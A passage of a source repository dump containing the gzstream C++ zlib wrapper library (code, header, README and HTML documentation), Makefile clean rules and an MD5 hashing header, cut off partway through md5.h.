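# rm -f: cleaning an already-clean tree is not an error.
clean :
	rm -f *.o

cleanall :
	rm -f *.o libgzstream.a test_gzip test_gunzip

# ============================================================================
# EOF

--------------------------------------------------------------------------------
/include/gzstream/README:
--------------------------------------------------------------------------------

gzstream
C++ iostream classes wrapping the zlib compression library.
===========================================================================

See index.html for documentation and installation instructions.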
7 | -------------------------------------------------------------------------------- /include/gzstream/gzstream.cpp: -------------------------------------------------------------------------------- 1 | // ============================================================================ 2 | // gzstream, C++ iostream classes wrapping the zlib compression library. 3 | // Copyright (C) 2001 Deepak Bandyopadhyay, Lutz Kettner 4 | // 5 | // This library is free software; you can redistribute it and/or 6 | // modify it under the terms of the GNU Lesser General Public 7 | // License as published by the Free Software Foundation; either 8 | // version 2.1 of the License, or (at your option) any later version. 9 | // 10 | // This library is distributed in the hope that it will be useful, 11 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | // Lesser General Public License for more details. 14 | // 15 | // You should have received a copy of the GNU Lesser General Public 16 | // License along with this library; if not, write to the Free Software 17 | // Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 18 | // ============================================================================ 19 | // 20 | // File : gzstream.C 21 | // Revision : $Revision: 1.7 $ 22 | // Revision_date : $Date: 2003/01/08 14:41:27 $ 23 | // Author(s) : Deepak Bandyopadhyay, Lutz Kettner 24 | // 25 | // Standard streambuf implementation following Nicolai Josuttis, "The 26 | // Standard C++ Library". 
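// ============================================================================

#ifdef __KALI__
#include "./gzstream.h"
#else
#include "include/gzstream/gzstream.h"
#endif
#include <iostream>
#include <string.h> // for memmove

#ifdef GZSTREAM_NAMESPACE
namespace GZSTREAM_NAMESPACE {
#endif

// ----------------------------------------------------------------------------
// Internal classes to implement gzstream. See header file for user classes.
// ----------------------------------------------------------------------------

// --------------------------------------
// class gzstreambuf:
// --------------------------------------

// Opens `name` through zlib's gzopen() for reading or for writing.
//
// open_mode is a std::ios open-mode bit mask. Append (ate/app) and combined
// in|out requests are rejected, as is a second open() on an already open
// buffer. Returns `this` on success and a null pointer on any failure.
//
// `name` is handed to gzopen() unchanged; callers that take the path from
// untrusted input have to validate it themselves.
gzstreambuf* gzstreambuf::open( const char* name, int open_mode) {
    if ( is_open())
        return (gzstreambuf*)0;
    mode = open_mode;
    // no append nor read/write mode
    if ((mode & std::ios::ate) || (mode & std::ios::app)
        || ((mode & std::ios::in) && (mode & std::ios::out)))
        return (gzstreambuf*)0;
    // Build the gzopen() mode string: "rb" or "wb" ("b" alone when neither
    // direction bit is set, leaving gzopen() to refuse it).
    char fmode[10];
    char* fmodeptr = fmode;
    if ( mode & std::ios::in)
        *fmodeptr++ = 'r';
    else if ( mode & std::ios::out)
        *fmodeptr++ = 'w';
    *fmodeptr++ = 'b';
    *fmodeptr = '\0';
    file = gzopen( name, fmode);
    if (file == 0)
        return (gzstreambuf*)0;
    opened = 1;
    return this;
}

// Flushes pending output and closes the compressed file.
//
// Returns `this` only when the buffer was open, the final flush succeeded
// and gzclose() reported Z_OK; otherwise a null pointer. The handle is
// closed in every case once the buffer was open, so a failed flush is
// reported to the caller instead of being silently dropped.
gzstreambuf * gzstreambuf::close() {
    if ( ! is_open())
        return (gzstreambuf*)0;
    const bool flushed = ( sync() == 0);
    opened = 0;
    const bool closed = ( gzclose( file) == Z_OK);
    return ( flushed && closed) ? this : (gzstreambuf*)0;
}

// Refills the get area from the compressed file (input buffers only).
// Returns the next character as an unsigned char value, or EOF when the
// buffer is not open for input or gzread() reports an error or end of file.
int gzstreambuf::underflow() { // used for input buffer only
    if ( gptr() && ( gptr() < egptr()))
        return * reinterpret_cast<unsigned char *>( gptr());

    if ( ! (mode & std::ios::in) || ! opened)
        return EOF;
    // Josuttis' implementation of inbuf
    int n_putback = gptr() - eback();
    if ( n_putback > 4)
        n_putback = 4;
    // Keep up to four already-read characters in front of the new data.
    // memmove, not memcpy: after a read that returned fewer than four bytes
    // the source range (the tail of the old get area) overlaps the 4-byte
    // putback area at the start of `buffer`, which memcpy does not allow.
    memmove( buffer + (4 - n_putback), gptr() - n_putback, n_putback);

    int num = gzread( file, buffer+4, bufferSize-4);
    if (num <= 0) // ERROR or EOF
        return EOF;

    // reset buffer pointers
    setg( buffer + (4 - n_putback), // beginning of putback area
          buffer + 4,               // read position
          buffer + 4 + num);        // end of buffer

    // return next character
    return * reinterpret_cast<unsigned char *>( gptr());
}

// Writes the whole put area with gzwrite() and rewinds the put pointer.
// Returns the number of bytes written, or EOF on a short write.
int gzstreambuf::flush_buffer() {
    // Separate the writing of the buffer from overflow() and
    // sync() operation.
    int w = pptr() - pbase();
    if ( gzwrite( file, pbase(), w) != w)
        return EOF;
    pbump( -w);
    return w;
}

// Called when the put area is full (output buffers only). Stores `c`
// unless it is EOF, flushes, and returns `c`; EOF when the buffer is not
// open for output or the flush fails.
int gzstreambuf::overflow( int c) { // used for output buffer only
    if ( ! ( mode & std::ios::out) || ! opened)
        return EOF;
    if (c != EOF) {
        // The put area set up by the constructor ends one byte before the
        // end of `buffer`, so this store is always in bounds.
        *pptr() = c;
        pbump(1);
    }
    if ( flush_buffer() == EOF)
        return EOF;
    return c;
}

// Flushes pending output. Returns 0 on success and -1 when the flush fails.
int gzstreambuf::sync() {
    // Changed to use flush_buffer() instead of overflow( EOF)
    // which caused improper behavior with std::endl and flush(),
    // bug reported by Vincent Ricard.
    if ( pptr() && pptr() > pbase()) {
        if ( flush_buffer() == EOF)
            return -1;
    }
    return 0;
}

// --------------------------------------
// class gzstreambase:
// --------------------------------------

// Attaches the embedded gzstreambuf and opens `name`; badbit is set on
// the stream when the open fails (see open()).
gzstreambase::gzstreambase( const char* name, int mode) {
    init( &buf);
    open( name, mode);
}

// Closes the buffer; a failure to close cannot be reported from here.
gzstreambase::~gzstreambase() {
    buf.close();
}

// Opens `name` and sets badbit on failure.
void gzstreambase::open( const char* name, int open_mode) {
    if ( ! buf.open( name, open_mode))
        clear( rdstate() | std::ios::badbit);
}

// Closes an open buffer and sets badbit when closing fails.
void gzstreambase::close() {
    if ( buf.is_open())
        if ( ! buf.close())
            clear( rdstate() | std::ios::badbit);
}

#ifdef GZSTREAM_NAMESPACE
} // namespace GZSTREAM_NAMESPACE
#endif

// ============================================================================
// EOF //

--------------------------------------------------------------------------------
/include/gzstream/gzstream.h:
--------------------------------------------------------------------------------
// ============================================================================
// gzstream, C++ iostream classes wrapping the zlib compression library.
// Copyright (C) 2001 Deepak Bandyopadhyay, Lutz Kettner
//
// This library is free software; you can redistribute it and/or
// modify it under the terms of the GNU Lesser General Public
// License as published by the Free Software Foundation; either
// version 2.1 of the License, or (at your option) any later version.
//
// This library is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
// Lesser General Public License for more details.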
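//
// You should have received a copy of the GNU Lesser General Public
// License along with this library; if not, write to the Free Software
// Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
// ============================================================================
//
// File : gzstream.h
// Revision : $Revision: 1.5 $
// Revision_date : $Date: 2002/04/26 23:30:15 $
// Author(s) : Deepak Bandyopadhyay, Lutz Kettner
//
// Standard streambuf implementation following Nicolai Josuttis, "The
// Standard C++ Library".
// ============================================================================

#ifndef GZSTREAM_H
#define GZSTREAM_H 1

// standard C++ with new header file names and std:: namespace
#include <iostream>
#include <fstream>
#include <zlib.h>

#ifdef GZSTREAM_NAMESPACE
namespace GZSTREAM_NAMESPACE {
#endif

// ----------------------------------------------------------------------------
// Internal classes to implement gzstream. See below for user classes.
// ----------------------------------------------------------------------------

// Stream buffer that reads from or writes to a gzip-compressed file through
// zlib's gz* functions. One instance serves a single direction at a time.
//
// The object owns the gzFile handle and closes it in its destructor, so a
// copy would share that handle; do not copy instances.
class gzstreambuf : public std::streambuf {
private:
    static const int bufferSize = 47+256; // size of data buff
    // totals 512 bytes under g++ for igzstream at the end.

    gzFile file;             // file handle for compressed file
    char buffer[bufferSize]; // data buffer
    char opened;             // open/close state of stream
    int mode;                // I/O mode

    int flush_buffer();
public:
    // file and mode are initialised as well as opened: underflow() and
    // overflow() test `mode` before `opened`, so on a buffer that was never
    // opened they would otherwise read an indeterminate value.
    gzstreambuf() : file(0), opened(0), mode(0) {
        // The put area stops one byte short of the buffer end so that
        // overflow() can always store the character it is handed.
        setp( buffer, buffer + (bufferSize-1));
        setg( buffer + 4,  // beginning of putback area
              buffer + 4,  // read position
              buffer + 4); // end position
        // ASSERT: both input & output capabilities will not be used together
    }
    int is_open() { return opened; }
    gzstreambuf* open( const char* name, int open_mode);
    gzstreambuf* close();
    ~gzstreambuf() { close(); }

    virtual int overflow( int c = EOF);
    virtual int underflow();
    virtual int sync();
};

// Common base of igzstream and ogzstream: holds the gzstreambuf and maps
// open/close failures onto the stream's badbit.
class gzstreambase : virtual public std::ios {
protected:
    gzstreambuf buf;
public:
    gzstreambase() { init(&buf); }
    gzstreambase( const char* name, int open_mode);
    ~gzstreambase();
    void open( const char* name, int open_mode);
    void close();
    gzstreambuf* rdbuf() { return &buf; }
};

// ----------------------------------------------------------------------------
// User classes. Use igzstream and ogzstream analogously to ifstream and
// ofstream respectively. They read and write files based on the gz*
// function interface of the zlib. Files are compatible with gzip compression.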
// ----------------------------------------------------------------------------

// Input stream over a gzip-compressed file; the default open mode is
// std::ios::in.
class igzstream : public gzstreambase, public std::istream
{
public:
    igzstream()
        : std::istream( &buf)
    {}

    igzstream( const char* name, int open_mode = std::ios::in)
        : gzstreambase( name, open_mode), std::istream( &buf)
    {}

    // Forwards to gzstreambase::open(), which sets badbit on failure.
    void open( const char* name, int open_mode = std::ios::in)
    {
        gzstreambase::open( name, open_mode);
    }

    // Both bases declare rdbuf(); this selects the gzstreambase one.
    gzstreambuf* rdbuf()
    {
        return gzstreambase::rdbuf();
    }
};

// Output stream over a gzip-compressed file; the default open mode is
// std::ios::out.
class ogzstream : public gzstreambase, public std::ostream
{
public:
    ogzstream()
        : std::ostream( &buf)
    {}

    ogzstream( const char* name, int mode = std::ios::out)
        : gzstreambase( name, mode), std::ostream( &buf)
    {}

    // Forwards to gzstreambase::open(), which sets badbit on failure.
    void open( const char* name, int open_mode = std::ios::out)
    {
        gzstreambase::open( name, open_mode);
    }

    // Both bases declare rdbuf(); this selects the gzstreambase one.
    gzstreambuf* rdbuf()
    {
        return gzstreambase::rdbuf();
    }
};

#ifdef GZSTREAM_NAMESPACE
} // namespace GZSTREAM_NAMESPACE
#endif

#endif // GZSTREAM_H
// ============================================================================
// EOF //

--------------------------------------------------------------------------------
/include/gzstream/index.html:
--------------------------------------------------------------------------------
<html> <head>
<title>Gzstream Library Home Page</title>
</head>
<body BGCOLOR="FAF8E8" TEXT="#000000">

<h1>Gzstream Library Home Page</h1>

<hr>
<TABLE><TR><TD ALIGN=LEFT VALIGN=TOP>
<img border=0 src="logo.gif" align=center>
</TD><TD ALIGN=LEFT VALIGN=TOP NOWRAP>
<ul>
<li><a href="#intro"> Introduction</a>
<li><a href="#sys"> Supported Systems</a>
<li><a href="#inst"> Installation</a>
<li><a href="#doc"> Documentation</a>
<li><a href="#miss"> What's Missing</a>
<li><a href="#src"> Download</a>
<li><a href="#links">
Links</a><P> 20 | </ul> 21 | </TD></TR></TABLE> 22 | 23 | 24 | <hr><!--------------------------------------------------------------------> 25 | <a name="intro"><h2> Introduction </h2></a> 26 | 27 | <i>Gzstream</i> is a small C++ library, basically just a wrapper, 28 | that provides the functionality of the 29 | <a href="http://www.gzip.org/zlib/">zlib C-library</a> in a C++ iostream. 30 | It is freely available under the <a href="COPYING.LIB">LGPL license</a>.<P> 31 | 32 | Gzstream has been written by 33 | <a href="http://www.cs.unc.edu/~debug/">Deepak Bandyopadhyay</a> and 34 | <a href="http://www.cs.unc.edu/~kettner/">Lutz Kettner</a> at 35 | the <a href="http://www.cs.unc.edu/Research/compgeom/">Computational 36 | Geometry Group at UNC Chapel Hill</a>.<P> 37 | 38 | 39 | <hr><!--------------------------------------------------------------------> 40 | <a name="sys"><h2> Supported Systems </h2></a> 41 | 42 | Gzstream requires a standard compliant C++ compiler (we use the new 43 | header file conventions and the new iostream in the std:: name space) 44 | and, of course, zlib. We used zlib 1.1.3 so far, but see the <a 45 | href="http://www.gzip.org/zlib/">zlib home page</a> for why you should 46 | upgrade to zlib 1.1.4. So, in theory, the provided sources could run 47 | on many platforms. However, we used only the following few 48 | platforms.<P> 49 | <P> 50 | 51 | <ul> 52 | <li> PC Linux, RedHat 6.1, g++ version 2.95.2 53 | <li> PC Linux, Debian, g++ version 2.95.2 and 3.1 54 | <li> SGI Irix 6.5, MIPSpro CC version 7.30 55 | </ul><P> 56 | 57 | 58 | <hr><!--------------------------------------------------------------------> 59 | <a name="inst"><h2> Installation </h2></a> 60 | 61 | Either compile <tt>gzstream.C</tt> by hand, place it in some library, 62 | and move <tt>gzstream.h</tt> into the include search path of your 63 | compiler. Or use the provided <tt>Makefile</tt>, adapt its 64 | variables, and follow the remarks in the <tt>Makefile</tt>. 
Two 65 | test programs are provided, <tt>test_gzip.C</tt> and <tt>test_gunzip.C</tt>. 66 | The <tt>Makefile</tt> contains a rule that performs a small test 67 | with these programs.<P> 68 | 69 | 70 | <hr><!--------------------------------------------------------------------> 71 | <a name="doc"><h2> Documentation </h2></a> 72 | 73 | The library provides two classes, <tt>igzstream</tt> and <tt>ogzstream</tt>, 74 | that can be used analogously to <tt>ifstream</tt> and <tt>ofstream</tt> 75 | respectively.<P> 76 | 77 | The classes are by default in the global name space. This can 78 | be changed by setting the macro <tt>GZSTREAM_NAMESPACE</tt> to 79 | the desired name space, e.g., by setting the option 80 | <tt>-DGZSTREAM_NAMESPACE=gz</tt> in the <tt>Makefile</tt>. 81 | However, this needs to be consistent for both, the library compilation 82 | and the application that uses the library.<P> 83 | 84 | 85 | <hr><!--------------------------------------------------------------------> 86 | <a name="miss"><h2> What's Missing </h2></a> 87 | 88 | <ul> 89 | <li> Seek. The zlib library provides the necessary functionality, 90 | but we have not realized that in the wrapper (yet? ;-). 91 | <li> Both streams are based on the same streambuffer. So, they 92 | cannot be used to derive an iogzstream class that would allow 93 | simultaneous reading and writing to the same file. 94 | </ul><P> 95 | 96 | 97 | <hr><!--------------------------------------------------------------------> 98 | <a name="src"><h2> Download and Release Notes</h2></a> 99 | 100 | <ul> 101 | <li> Gzstream library 1.5 (08 Apr 2003): 102 | <a href="gzstream.tgz">gzstream.tgz</a><br> 103 | Fixed bug that did not set the state correctly on failure to open or 104 | close a file. <br> 105 | Fixed bug in the indexing of the write buffer that 106 | caused the write buffer to shrink continuously and finally caused 107 | wrong results when writing compressed files (only observed on some 108 | platforms).
<P> 109 | <li> Gzstream library 1.4 (27 Apr 2002):<br> 110 | Fixed a bug that stopped stream output after calling <tt>flush()</tt> 111 | or using <tt>std::endl</tt>.<P> 112 | <li> Gzstream library 1.3 (06 Nov 2001):<br> 113 | Fixed unsigned char -- signed char bug. Increased buffer size 114 | for better performance.<P> 115 | <li> Gzstream library 1.2 (04 Oct 2001):<br> 116 | Initial release as gzstream, renamed from zipstream.<P> 117 | <li> Zipstream library 1.1 (09 Sep 2001):<br> 118 | Initial release. 119 | </ul> 120 | 121 | <hr><!--------------------------------------------------------------------> 122 | <a name="links"><h2> Acknowledgements </h2></a> 123 | 124 | Credits for finding bugs and improving this software go to: 125 | Vincent Ricard, Peter Milley, Peter J. Torelli, and Ares Lagae. 126 | <P> 127 | 128 | <hr><!--------------------------------------------------------------------> 129 | <a name="links"><h2> Links </h2></a> 130 | 131 | <ul> 132 | <li><a href="http://www.gzip.org/zlib/">zlib C-library</a> 133 | <li><a href="http://www.cs.unc.edu/~debug/">Deepak Bandyopadhyay</a> 134 | <li><a href="http://www.cs.unc.edu/~kettner/">Lutz Kettner</a> 135 | <li><a href="http://www.cs.unc.edu/Research/compgeom/"> 136 | The Computational Geometry Group at UNC Chapel Hill</a> 137 | </ul> 138 | 139 | <hr><!--------------------------------------------------------------------> 140 | <address> 141 | The Computational Geometry Group at UNC Chapel Hill, Jan. 08, 2003. 
142 | </address> 143 | </body> </html> 144 | <!--------------------------------------------------------------------> 145 | <!EOF> 146 | -------------------------------------------------------------------------------- /include/gzstream/logo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/include/gzstream/logo.gif -------------------------------------------------------------------------------- /include/gzstream/version: -------------------------------------------------------------------------------- 1 | 1.5 (08 Jan 2003) 2 | -------------------------------------------------------------------------------- /include/md5.h: -------------------------------------------------------------------------------- 1 | #ifndef MD5_H 2 | #define MD5_H 3 | 4 | // Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All 5 | // rights reserved. 6 | 7 | // License to copy and use this software is granted provided that it 8 | // is identified as the "RSA Data Security, Inc. MD5 Message-Digest 9 | // Algorithm" in all material mentioning or referencing this software 10 | // or this function. 11 | // 12 | // License is also granted to make and use derivative works provided 13 | // that such works are identified as "derived from the RSA Data 14 | // Security, Inc. MD5 Message-Digest Algorithm" in all material 15 | // mentioning or referencing the derived work. 16 | // 17 | // RSA Data Security, Inc. makes no representations concerning either 18 | // the merchantability of this software or the suitability of this 19 | // software for any particular purpose. It is provided "as is" 20 | // without express or implied warranty of any kind. 21 | // 22 | // These notices must be retained in any copies of any part of this 23 | // documentation and/or software. 24 | 25 | 26 | 27 | // The original md5 implementation avoids external libraries. 
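// This version has dependency on stdio.h for file input and
// string.h for memcpy.
#include <stdio.h>
#include <string.h>

//#pragma region MD5 defines
// Constants for MD5Transform routine.
// Sxy is the left-rotation amount passed to the round-x step macros.
#define S11 7
#define S12 12
#define S13 17
#define S14 22
#define S21 5
#define S22 9
#define S23 14
#define S24 20
#define S31 4
#define S32 11
#define S33 16
#define S34 23
#define S41 6
#define S42 10
#define S43 15
#define S44 21






// A single 0x80 byte followed by 63 zero bytes.
static unsigned char PADDING[64] = {
  0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
};

// F, G, H and I are basic MD5 functions.
// Every use of an argument is parenthesised, including under '~', so that
// an expression argument such as (a | b) is complemented as a whole.
#define F(x, y, z) (((x) & (y)) | ((~(x)) & (z)))
#define G(x, y, z) (((x) & (z)) | ((y) & (~(z))))
#define H(x, y, z) ((x) ^ (y) ^ (z))
#define I(x, y, z) ((y) ^ ((x) | (~(z))))

// ROTATE_LEFT rotates x left n bits.
// The (32-(n)) term is only a rotation when x is an unsigned type exactly
// 32 bits wide; with a wider type, bits above bit 31 are shifted back into
// the result.
#define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n))))

// FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4.
// Rotation is separate from addition to prevent recomputation.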
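#define FF(a, b, c, d, x, s, ac) { \
    (a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \
    (a) = ROTATE_LEFT ((a), (s)); \
    (a) += (b); \
  }
#define GG(a, b, c, d, x, s, ac) { \
    (a) += G ((b), (c), (d)) + (x) + (UINT4)(ac); \
    (a) = ROTATE_LEFT ((a), (s)); \
    (a) += (b); \
  }
#define HH(a, b, c, d, x, s, ac) { \
    (a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \
    (a) = ROTATE_LEFT ((a), (s)); \
    (a) += (b); \
  }
#define II(a, b, c, d, x, s, ac) { \
    (a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \
    (a) = ROTATE_LEFT ((a), (s)); \
    (a) += (b); \
  }
//#pragma endregion

typedef unsigned char BYTE ;

// POINTER defines a generic pointer type
typedef unsigned char *POINTER;

// UINT2 defines a two byte word
typedef unsigned short int UINT2;

// UINT4 defines a four byte word.
// It must be exactly 32 bits wide: the round macros rely on additions
// wrapping at 2^32. `unsigned long` is 8 bytes on LP64 systems (64-bit
// Linux and Android), where the extra high bits leak into the rotations and
// the resulting digests are wrong. `unsigned int` is 4 bytes on the 32- and
// 64-bit Linux, Android and Windows ABIs.
typedef unsigned int UINT4;


// convenient object that wraps
// the C-functions for use in C++ only
//
// MD5 is not collision resistant. Use these digests to label or de-duplicate
// data, not to prove that data has not been tampered with.
class MD5
{
private:
struct __context_t {
  UINT4 state[4]; /* state (ABCD) */
  UINT4 count[2]; /* number of bits, modulo 2^64 (lsb first) */
  unsigned char buffer[64]; /* input buffer */
} context ;

// #pragma region static helper functions
// The core of the MD5 algorithm is here.
// MD5 basic transformation. Transforms state based on block.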
static void MD5Transform( UINT4 state[4], unsigned char block[64] )
{
  // state: the four chaining words (A, B, C, D); updated in place.
  // block: 64 bytes of message data, decoded below into sixteen words.
  UINT4 a = state[0], b = state[1], c = state[2], d = state[3], x[16];

  Decode (x, block, 64);

  // The 64 steps below must stay in this exact order; the trailing number on
  // each line is the step index.

  /* Round 1 */
  FF (a, b, c, d, x[ 0], S11, 0xd76aa478); /* 1 */
  FF (d, a, b, c, x[ 1], S12, 0xe8c7b756); /* 2 */
  FF (c, d, a, b, x[ 2], S13, 0x242070db); /* 3 */
  FF (b, c, d, a, x[ 3], S14, 0xc1bdceee); /* 4 */
  FF (a, b, c, d, x[ 4], S11, 0xf57c0faf); /* 5 */
  FF (d, a, b, c, x[ 5], S12, 0x4787c62a); /* 6 */
  FF (c, d, a, b, x[ 6], S13, 0xa8304613); /* 7 */
  FF (b, c, d, a, x[ 7], S14, 0xfd469501); /* 8 */
  FF (a, b, c, d, x[ 8], S11, 0x698098d8); /* 9 */
  FF (d, a, b, c, x[ 9], S12, 0x8b44f7af); /* 10 */
  FF (c, d, a, b, x[10], S13, 0xffff5bb1); /* 11 */
  FF (b, c, d, a, x[11], S14, 0x895cd7be); /* 12 */
  FF (a, b, c, d, x[12], S11, 0x6b901122); /* 13 */
  FF (d, a, b, c, x[13], S12, 0xfd987193); /* 14 */
  FF (c, d, a, b, x[14], S13, 0xa679438e); /* 15 */
  FF (b, c, d, a, x[15], S14, 0x49b40821); /* 16 */

  /* Round 2 */
  GG (a, b, c, d, x[ 1], S21, 0xf61e2562); /* 17 */
  GG (d, a, b, c, x[ 6], S22, 0xc040b340); /* 18 */
  GG (c, d, a, b, x[11], S23, 0x265e5a51); /* 19 */
  GG (b, c, d, a, x[ 0], S24, 0xe9b6c7aa); /* 20 */
  GG (a, b, c, d, x[ 5], S21, 0xd62f105d); /* 21 */
  // 7-digit literal: the leading zero of 0x02441453 is simply not written.
  GG (d, a, b, c, x[10], S22, 0x2441453); /* 22 */
  GG (c, d, a, b, x[15], S23, 0xd8a1e681); /* 23 */
  GG (b, c, d, a, x[ 4], S24, 0xe7d3fbc8); /* 24 */
  GG (a, b, c, d, x[ 9], S21, 0x21e1cde6); /* 25 */
  GG (d, a, b, c, x[14], S22, 0xc33707d6); /* 26 */
  GG (c, d, a, b, x[ 3], S23, 0xf4d50d87); /* 27 */
  GG (b, c, d, a, x[ 8], S24, 0x455a14ed); /* 28 */
  GG (a, b, c, d, x[13], S21, 0xa9e3e905); /* 29 */
  GG (d, a, b, c, x[ 2], S22, 0xfcefa3f8); /* 30 */
  GG (c, d, a, b, x[ 7], S23, 0x676f02d9); /* 31 */
  GG (b, c, d, a, x[12], S24, 0x8d2a4c8a); /* 32 */

  /* Round 3 */
  HH (a, b, c, d, x[ 5], S31, 0xfffa3942); /* 33 */
  HH (d, a, b, c, x[ 8], S32, 0x8771f681); /* 34 */
  HH (c, d, a, b, x[11], S33, 0x6d9d6122); /* 35 */
  HH (b, c, d, a, x[14], S34, 0xfde5380c); /* 36 */
  HH (a, b, c, d, x[ 1], S31, 0xa4beea44); /* 37 */
  HH (d, a, b, c, x[ 4], S32, 0x4bdecfa9); /* 38 */
  HH (c, d, a, b, x[ 7], S33, 0xf6bb4b60); /* 39 */
  HH (b, c, d, a, x[10], S34, 0xbebfbc70); /* 40 */
  HH (a, b, c, d, x[13], S31, 0x289b7ec6); /* 41 */
  HH (d, a, b, c, x[ 0], S32, 0xeaa127fa); /* 42 */
  HH (c, d, a, b, x[ 3], S33, 0xd4ef3085); /* 43 */
  // 7-digit literal: the leading zero of 0x04881d05 is simply not written.
  HH (b, c, d, a, x[ 6], S34, 0x4881d05); /* 44 */
  HH (a, b, c, d, x[ 9], S31, 0xd9d4d039); /* 45 */
  HH (d, a, b, c, x[12], S32, 0xe6db99e5); /* 46 */
  HH (c, d, a, b, x[15], S33, 0x1fa27cf8); /* 47 */
  HH (b, c, d, a, x[ 2], S34, 0xc4ac5665); /* 48 */

  /* Round 4 */
  II (a, b, c, d, x[ 0], S41, 0xf4292244); /* 49 */
  II (d, a, b, c, x[ 7], S42, 0x432aff97); /* 50 */
  II (c, d, a, b, x[14], S43, 0xab9423a7); /* 51 */
  II (b, c, d, a, x[ 5], S44, 0xfc93a039); /* 52 */
  II (a, b, c, d, x[12], S41, 0x655b59c3); /* 53 */
  II (d, a, b, c, x[ 3], S42, 0x8f0ccc92); /* 54 */
  II (c, d, a, b, x[10], S43, 0xffeff47d); /* 55 */
  II (b, c, d, a, x[ 1], S44, 0x85845dd1); /* 56 */
  II (a, b, c, d, x[ 8], S41, 0x6fa87e4f); /* 57 */
  II (d, a, b, c, x[15], S42, 0xfe2ce6e0); /* 58 */
  II (c, d, a, b, x[ 6], S43, 0xa3014314); /* 59 */
  II (b, c, d, a, x[13], S44, 0x4e0811a1); /* 60 */
  II (a, b, c, d, x[ 4], S41, 0xf7537e82); /* 61 */
  II (d, a, b, c, x[11], S42, 0xbd3af235); /* 62 */
  II (c, d, a, b, x[ 2], S43, 0x2ad7d2bb); /* 63 */
  II (b, c, d, a, x[ 9], S44, 0xeb86d391); /* 64 */

  // Fold this block's result into the running chaining value.
  state[0] += a;
  state[1] += b;
  state[2] += c;
  state[3] += d;

  // Zeroize sensitive information.
  // NOTE(review): x goes out of scope immediately after this call, so an
  // optimising compiler is allowed to treat the memset as a dead store and
  // drop it. If wiping the decoded block matters, use a clearing mechanism
  // the optimiser cannot remove.
  memset((POINTER)x, 0, sizeof (x));
}

// Encodes input (UINT4) into output (unsigned char). Assumes len is
// a multiple of 4.
// Each word is written least-significant byte first; only the low 32 bits
// of a word are emitted. len is the number of OUTPUT bytes.
static void Encode( unsigned char *output, UINT4 *input, unsigned int len )
{
  unsigned int i, j;

  for (i = 0, j = 0; j < len; i++, j += 4) {
    output[j] = (unsigned char)(input[i] & 0xff);
    output[j+1] = (unsigned char)((input[i] >> 8) & 0xff);
    output[j+2] = (unsigned char)((input[i] >> 16) & 0xff);
    output[j+3] = (unsigned char)((input[i] >> 24) & 0xff);
  }
}

// Decodes input (unsigned char) into output (UINT4). Assumes len is
// a multiple of 4.
// Inverse of Encode: four input bytes, least-significant first, form one
// word. len is the number of INPUT bytes; output must hold len/4 words.
static void Decode( UINT4 *output, unsigned char *input, unsigned int len )
{
  unsigned int i, j;

  for (i = 0, j = 0; j < len; i++, j += 4)
    output[i] = ((UINT4)input[j]) | (((UINT4)input[j+1]) << 8) |
      (((UINT4)input[j+2]) << 16) | (((UINT4)input[j+3]) << 24);
}
// #pragma endregion


public:
// MAIN FUNCTIONS
// Constructs a hasher with a freshly initialised context. Only the context
// is set up here: digestRaw and digestChars are not written until Final()
// has run, so they must not be read before the first digest is computed.
MD5()
{
  Init() ;
}

// MD5 initialization. Begins an MD5 operation, writing a new context.
// Resets the bit count and the four chaining words; the input buffer and the
// digest members are left as they are.
void Init()
{
  context.count[0] = context.count[1] = 0;

  // Load magic initialization constants.
  context.state[0] = 0x67452301;
  context.state[1] = 0xefcdab89;
  context.state[2] = 0x98badcfe;
  context.state[3] = 0x10325476;
}

// MD5 block update operation. Continues an MD5 message-digest
// operation, processing another message block, and updating the
// context.
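void Update(
  unsigned char *input,   // input block
  unsigned int inputLen ) // length of input block, in bytes
{
  unsigned int i, index, partLen;

  // Compute number of bytes mod 64
  index = (unsigned int)((context.count[0] >> 3) & 0x3F);

  // Update number of bits; a wrap of the low word carries into the high word
  if ((context.count[0] += ((UINT4)inputLen << 3))
    < ((UINT4)inputLen << 3))
    context.count[1]++;
  context.count[1] += ((UINT4)inputLen >> 29);

  // Free space left in the 64-byte staging buffer
  partLen = 64 - index;

  // Transform as many times as possible.
  if (inputLen >= partLen) {
    // Complete the buffered partial block first, then hash whole blocks
    // straight from the caller's memory.
    memcpy((POINTER)&context.buffer[index], (POINTER)input, partLen);
    MD5Transform (context.state, context.buffer);

    for (i = partLen; i + 63 < inputLen; i += 64)
      MD5Transform (context.state, &input[i]);

    index = 0;
  }
  else
    i = 0;

  /* Buffer remaining input */
  memcpy((POINTER)&context.buffer[index], (POINTER)&input[i], inputLen-i);
}

// MD5 finalization. Ends an MD5 message-digest operation, writing the
// the message digest and zeroizing the context.
// Writes to digestRaw (and, through writeToString, to digestChars).
// Init() must be called again before the object is reused.
void Final()
{
  unsigned char bits[8];
  unsigned int index, padLen;

  // Save number of bits
  Encode( bits, context.count, 8 );

  // Pad out to 56 mod 64.
  index = (unsigned int)((context.count[0] >> 3) & 0x3f);
  padLen = (index < 56) ? (56 - index) : (120 - index);
  Update( PADDING, padLen );

  // Append length (before padding)
  Update( bits, 8 );

  // Store state in digest
  Encode( digestRaw, context.state, 16);

  // Zeroize sensitive information.
  memset((POINTER)&context, 0, sizeof (context));

  writeToString() ;
}

/// Renders digestRaw as 32 lower-case hex digits plus a terminating NUL
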